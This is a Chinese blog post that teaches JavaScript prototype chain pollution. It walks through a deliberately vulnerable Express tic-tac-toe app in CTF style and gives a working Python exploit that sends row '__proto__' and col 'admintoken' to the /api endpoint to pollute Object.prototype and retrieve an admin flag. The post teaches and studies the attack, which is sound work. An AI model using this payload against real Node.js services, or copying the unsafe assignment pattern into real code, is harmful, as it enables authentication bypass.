原型链污染小结

最新推荐文章于 2024-07-19 19:56:04 发布
最新推荐文章于 2024-07-19 19:56:04 发布
阅读量69 收藏
点赞数
文章标签: 原型模式
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54704770/article/details/132059830
版权

目录

JS原型链污染

一、原型链

1.1什么是“原型对象”?

JS的每个函数在创建的时候,都会生成一个属性prototype,这个属性指向一个对象,这个对象就是此函数的原型对象。该原型对象中有个属性为constructor,指向该函数,原型对象和它的函数之间就产生了联系。原型链 JavaScript 中所有的对象都是由它的原型对象继承而来,每一个原型对象都有一个指向它的原型(prototype)的内部链接,这个原型对象又有它自己的原型,对象都是始于object的原型,即object.prototype,而最终原型是null。

1.2什么原型链

原型链使用继承原理,原型对象自身也是一个对象,它也有自己的原型对象,这样层层上溯,就形成了一个类似链表的结构,这就是原型链。

二、基础属性(prototype、proto、constructor)

2.1 prototype

简单来说,当我们创建一个函数的时候,系统就会自动分配一个 prototype属性,可以用来存储可以让所有实例共享的属性和方法。

function company(){
  this.name = 'zs'
}

company.prototype.test = function test(){
  console.log(this.name)
}

company.prototype.age = 20

let p1 = new company()
let p2 = new company()

p1.test() //zs
console.log(p1.age) //20

上面代码通过company的构造函数prototype,利用test方法在上面添加了一个name属性,因为company是创建的实例对象p1的原型对象,所以p1即使没有定义name属性也能直接使用test方法,也就是说,当实例对象本身没有某个属性或方法的时候,它会到原型对象去寻找该属性或方法。

2.2 __proto__

每个通过构造函数创建出来的实例对象,其本身有个属性__proto__,这个属性会指向该实例对象的构造函数的原型对象;因为我们可以通过Foo.prototype来访问Foo类的原型,但Foo实例化出来的对象,是不能通过prototype访问原型的,所以我们可以使用__proto__来访问想要查询的原型对象。
在这里插入图片描述

2.3 constructor

constructor是一个对象的数据属性,创建对象后,访问constructor属性,可以返回构造该对象的来源。
在这里插入图片描述

三、原型链污染例题

运行之前需要配置好node.js环境!
代码:

const express = require('express')
var hbs = require('hbs');
var bodyParser = require('body-parser');
const md5 = require('md5');
var morganBody = require('morgan-body');
const app = express();
var user = []; //empty for now

var matrix = [];
for (var i = 0; i < 3; i++){
    matrix[i] = [null , null, null];
}

function draw(mat) {
    var count = 0;
    for (var i = 0; i < 3; i++){
        for (var j = 0; j < 3; j++){
            if (matrix[i][j] !== null){
                count += 1;
            }
        }
    }
    return count === 9;
}

app.use(express.static('public'));
app.use(bodyParser.json());
app.set('view engine', 'html');
morganBody(app);
app.engine('html', require('hbs').__express);

app.get('/', (req, res) => {

    for (var i = 0; i < 3; i++){
        matrix[i] = [null , null, null];

    }
    res.render('index');
})


app.get('/admin', (req, res) => { 
    /*this is under development I guess ??*/
    console.log(user.admintoken);
    if(user.admintoken && req.query.querytoken && md5(user.admintoken) === req.query.querytoken){
        res.send('Hey admin your flag is <b>flag{prototype_pollution_is_very_dangerous}</b>');
    } 
    else {
        res.status(403).send('Forbidden');
    }    
}
)


app.post('/api', (req, res) => {
    var client = req.body;
    var winner = null;

    if (client.row > 3 || client.col > 3){
        client.row %= 3;
        client.col %= 3;
    }
    matrix[client.row][client.col] = client.data;
    for(var i = 0; i < 3; i++){
        if (matrix[i][0] === matrix[i][1] && matrix[i][1] === matrix[i][2] ){
            if (matrix[i][0] === 'X') {
                winner = 1;
            }
            else if(matrix[i][0] === 'O') {
                winner = 2;
            }
        }
        if (matrix[0][i] === matrix[1][i] && matrix[1][i] === matrix[2][i]){
            if (matrix[0][i] === 'X') {
                winner = 1;
            }
            else if(matrix[0][i] === 'O') {
                winner = 2;
            }
        }
    }

    if (matrix[0][0] === matrix[1][1] && matrix[1][1] === matrix[2][2] && matrix[0][0] === 'X'){
        winner = 1;
    }
    if (matrix[0][0] === matrix[1][1] && matrix[1][1] === matrix[2][2] && matrix[0][0] === 'O'){
        winner = 2;
    } 

    if (matrix[0][2] === matrix[1][1] && matrix[1][1] === matrix[2][0] && matrix[2][0] === 'X'){
        winner = 1;
    }
    if (matrix[0][2] === matrix[1][1] && matrix[1][1] === matrix[2][0] && matrix[2][0] === 'O'){
        winner = 2;
    }

    if (draw(matrix) && winner === null){
        res.send(JSON.stringify({winner: 0}))
    }
    else if (winner !== null) {
        res.send(JSON.stringify({winner: winner}))
    }
    else {
        res.send(JSON.stringify({winner: -1}))
    }

})
app.listen(3000, () => {
    console.log('app listening on port 3000!')
})

首先观察代码可以看到拿到flag的条件:
条件是user数组必须有admintoken这个属性,并且该属性的md5值必须等于传入的属性值

if(user.admintoken && req.query.querytoken && md5(user.admintoken) === req.query.querytoken){
        res.send('Hey admin your flag is <b>flag{prototype_pollution_is_very_dangerous}</b>');
    }

在中间有一行代码可有可控的参数,可以从中下手;

 matrix[client.row][client.col] = client.data;

由于赋值语句中的data是可控的,matrix和user是在全局下定义的数组,所以我们可以利用这条语句传入我们的payload,污染原型链;


matrix[client.row][client.col] = client.data;
matrix.client.row.client.col = client.data;
matrix.__proto__.admintoken = md5(admin);

接着再通过python发送post请求:

import requests
import json
 
url1 = "http://192.168.1.12:3000/api"
url2 = "http://192.168.1.12:3000/admin?querytoken=21232f297a57a5a743894a0e4a801fc3"

s = requests.session()
 
headers = {"Content-type": "application/json"}
data1 = {"row": "__proto__", "col": "admintoken", "data": "admin"}
 
res1 = s.post(url1, headers=headers, data=json.dumps(data1))
res2 = s.get(url2)
 
print(res2.text)

再运行编写的代码,发送post请求,成功拿到flag;
在这里插入图片描述

补充:

在搭建环境最后,使用本地IP地址访问3000端口时,一直报错,提示ip地址拒绝连接请求,原因是没有服务器没有打开,使用下面命令即可;
在这里插入图片描述

简了Grd
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【web安全】Nodejs原型污染分析
「 虚幻私塾」
02-14 681
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 Nodejs原型污染分析 什么是js原型? 可以将js原型理解为其他OOP语言中的类,但还是有细微区别。 1. function F(){...} 2. var f = new F(); 分析: 1.创建一个func F,同时创立了一个F对象(该对象默认是接着Object的原
原型污染漏洞(一)
lonmar的博客
11-09 2286
文章目录0x01 深入了解JavaScript对象与类0x02 什么是原型污染0x03 哪些情况下原型链会被污染1. 最显然的情况2.利用某些API来进行攻击3. 找出易受攻击的API0x04 Attacking1. 拒绝服务2. for循环污染3. 属性注入0x05 针对Prototype pollution的防御1. 原型冻结2. Schema validation of JSON input3. 使用MAP代替Object4.Object.create(null) 0x01 深入了解JavaScri
node.js原型污染小结
qq_61209261的博客
07-16 756
node.js原型小结
Week小结
qq_61209261的博客
07-15 314
Web安全学习
原型污染漏洞+前后端实战案例
08-04
原型污染漏洞是一种安全问题,它允许攻击者通过篡改或注入代码来操纵对象的原型,从而可能导致数据泄漏、逻辑错误甚至完全控制应用程序。本文将深入探讨原型污染的概念、其产生的原因以及在前端和后端开发中的...
javascript中对象的定义、使用以及对象和原型链操作小结
10-20
- **原型链的遍历**:使用`for...in`循环遍历对象时,不仅会访问到对象自身的属性,还会沿着原型链访问到所有继承的属性。例如,`test.prototype.z=3;`,在遍历`my`对象时,`my.z`也会被访问到。 - **属性冲突处理...
小白谈谈对JS原型链的理解
01-19
原型链理解起来有点绕了,网上资料也是很多,每次晚上睡不着的时候总喜欢在网上找点原型链和闭包的文章看,效果极好。 不要纠结于那一堆术语了,那除了让你脑筋拧成麻花,真的不能帮你什么。简单粗暴点看原型链吧,...
原型链全套图解.rar
04-20
在JavaScript中,原型链是理解对象继承和属性查找机制的关键概念。它是一种基于原型(prototype)的继承方式,使得一个对象能够从另一个对象那里继承属性和方法。在本压缩包"原型链全套图解.rar"中,包含了全面的...
求立方体面积体积以及判断(c++)
XAX520_1314的博客
07-16 294
刷题
js | 原型
YuuuPeeiiiii的博客
07-16 237
为什么前者会输出Lucas 后者不会?call动作具体干了什么?
js | Core
YuuuPeeiiiii的博客
07-17 270
总结就是 proto 只是一个访问方式,现在慢慢被舍弃了,没显示,可能是浏览器的问题。实际上你仔细对比,只要是有[[prototype]]或者__proto__就行了。例如,下面的,son是对象,foo不是对象。打印出来的son,能看到有一个prototype 对象。_: 那[[prototype]]是私有属性,访问不了也改不了,那就不访问不改了?也就是标记对象是从哪个对象继承来的。_ 就是用改[[prototype]]的。[[prototype]] :是对象的。_,只有[[protptype]]啊?
java设计模式:02-02-原型模式
Mr_Air_Boy的博客
07-17 341
原型模式(Prototype Pattern)用于创建重复的对象,同时又能保证性能。它属于创建型设计模式,使用现有的实例来创建新对象,而不是每次都通过实例化来创建新对象。原型模式通过克隆已有对象来创建新的实例。
泛型新理解
qq_53374893的博客
07-19 168
若有返回值,他会在编译期间加上强制类型转换成你传入进去的类型,相同的类型,保证类型安全转换,若是不同类型,则会在编译期间报错,告诉你类型不正确,这就是 类型擦除!方法三 : 因为给了 T的字节码对象,所以字节码对象是不会在编译期 擦除,所以编译还是知道 T是什么类型,也能够检测出 U的类型是不是 T的同类或子类。方法二 :因为显示 约束了 T 的类型, 泛型会被擦除为People 类型的下届或者同级,所以编译器能够约束好 U的类型 是T 的同类或子类。加了这个是可以进行集合的强转泛型的,不加是转不了的。
Linux的热插拔UDEV机制和守护进程
weixin_54859557的博客
07-19 506
Linux的热插拔UDEV机制和守护进程
设计模式11-原型模式
qq_41810539的博客
07-19 914
通过对象创建模式绕开动态内存分配来避免创建过程中所导致的耦合过紧的问题。从而支持对象创建的稳定,它是接口抽象之后的第一步工作。原型模式同样用于隔离类对象的使用者和具体类型之间的耦合关系,同样要求这些异变类拥有稳定的接口。原型模式对于如何创建异变类的实体对象,采用原型克隆的方法来做。它使得我们可以非常灵活的动态创建。拥有某些稳定接口的新对象。所需工作仅仅是注册一个新类的对象即原型,然后在任何需要的地方克隆。原型模式中的克隆方法可以利用某些框架中的序列化,来实现深拷贝。
new一个对象的具体步骤
yiguoxiaohai的博客
07-19 296
new一个对象的具体步骤
数据分析的核心技能和方法
最新发布
07-19
数据分析的核心技能和方法
毕业设计javajsp人寿保险销售网站(ssh)-qkrp源码含文档工具包
07-19
毕业设计javajsp人寿保险销售网站(ssh)-qkrp源码含文档工具包 后台是ssh框架,页面是jsp,数据库mysql,jdk1.8,开发工具用ecplise、myecplise、sts、idea都可以 平湖人寿保险公司保险销售网站分为用户和管理员两个部分 前台部分(用户界面): 1、资讯浏览功能: (1)新闻资讯浏览 (2)新闻资讯查询 (3)公司简介 (4)通知公告 2、用户登录注册功能: (1)注册 (2)登录 3、用户管理功能 (1)个人信息管理 (2)订单管理 4、保险购买功能: (1)保险产品浏览 (2)保险产品查询 (3)保险产品购买 后台管理(管理员界面) 1、管理员登录功能: 管理员在管理员登录界面输入用户名和密码,即可登录管理员的界面。 2、资讯管理功能: (1)新闻资讯管理 (2)公司简介管理 (3)通知公告管理 3、保险产品管理: (1)保险产品信息管理 (2)保险产品查询 4、会员管理: (1)会员删除 (2)会员级别管理 5、统计管理: (1)保险产品销售量统计 (2)有效会员数量统计 包含:源码、数据库脚本、论文、环境工具包、相同框架项目的安装教程
ctfshow 原型污染
10-14
好的,你的问题是关于原型污染的。原型污染是一种攻击方式,通过修改目标对象的原型链来实现攻击目的。攻击者可以通过修改原型链来篡改对象的属性或方法,从而达到攻击的目的。 例如,攻击者可以通过修改Object...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值